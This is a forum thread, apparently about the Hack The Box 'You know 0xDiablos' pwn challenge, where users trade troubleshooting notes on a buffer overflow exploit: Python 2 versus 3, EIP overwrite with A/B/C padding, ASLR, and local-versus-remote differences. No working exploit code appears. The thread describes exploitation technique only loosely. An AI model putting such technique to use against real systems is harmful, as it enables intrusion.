[pwn] You know 0xDiablos

Got the flag :). Could anyone get this exploit to work in Python 3? I managed to do it with Python 2 in the end, but would’ve liked to do it in Python 3…

I’ve never done a BUF before and im trying to read through assembly docuementiation but I think I have the right idea, ive made a payload to send and have the address I need, but I still get a fault error when sending it.

If someone could pm me a hint or something that would be great. I also dont know where to put variables

Type your comment> @Oscuridad said:

I’ve never done a BUF before and im trying to read through assembly docuementiation but I think I have the right idea, ive made a payload to send and have the address I need, but I still get a fault error when sending it.

If someone could pm me a hint or something that would be great. I also dont know where to put variables

Send me the exploit on discord “Alex Zander#0764”

I’m confused, I’m testing a BOF, and successfully overwriting EIP in a VM, but doing the same on a physical box doesn’t work?

ASLR is off on both…

Same length payload of 'A’s, then 4* ‘B’, and 4* 'C’s.

On the VM : EIP gets ‘BBBB’, with ESP at ‘CCCC’.
On the physical box : EIP gets ‘AAAA’, with ESP at ‘BBBBCCCC’ ?

Environments were NOT the same! Lesson learned. Problem solved.

I am really confused. In Kali VM, using gdb/gef/pwntools after many hours finally got a successful exploit.py (from gef skel) working. But only locally. Remotely I get the 'A’s string echoed back. Playing with the length of those ‘A’ I will get same thing back, or nothing, or connection refused for several minutes.

I do not understand why it would work in VM but not remotely. I cannot imagine that remotely it is not running in a VM or Docker container…

Type your comment> @Baseizo7 said: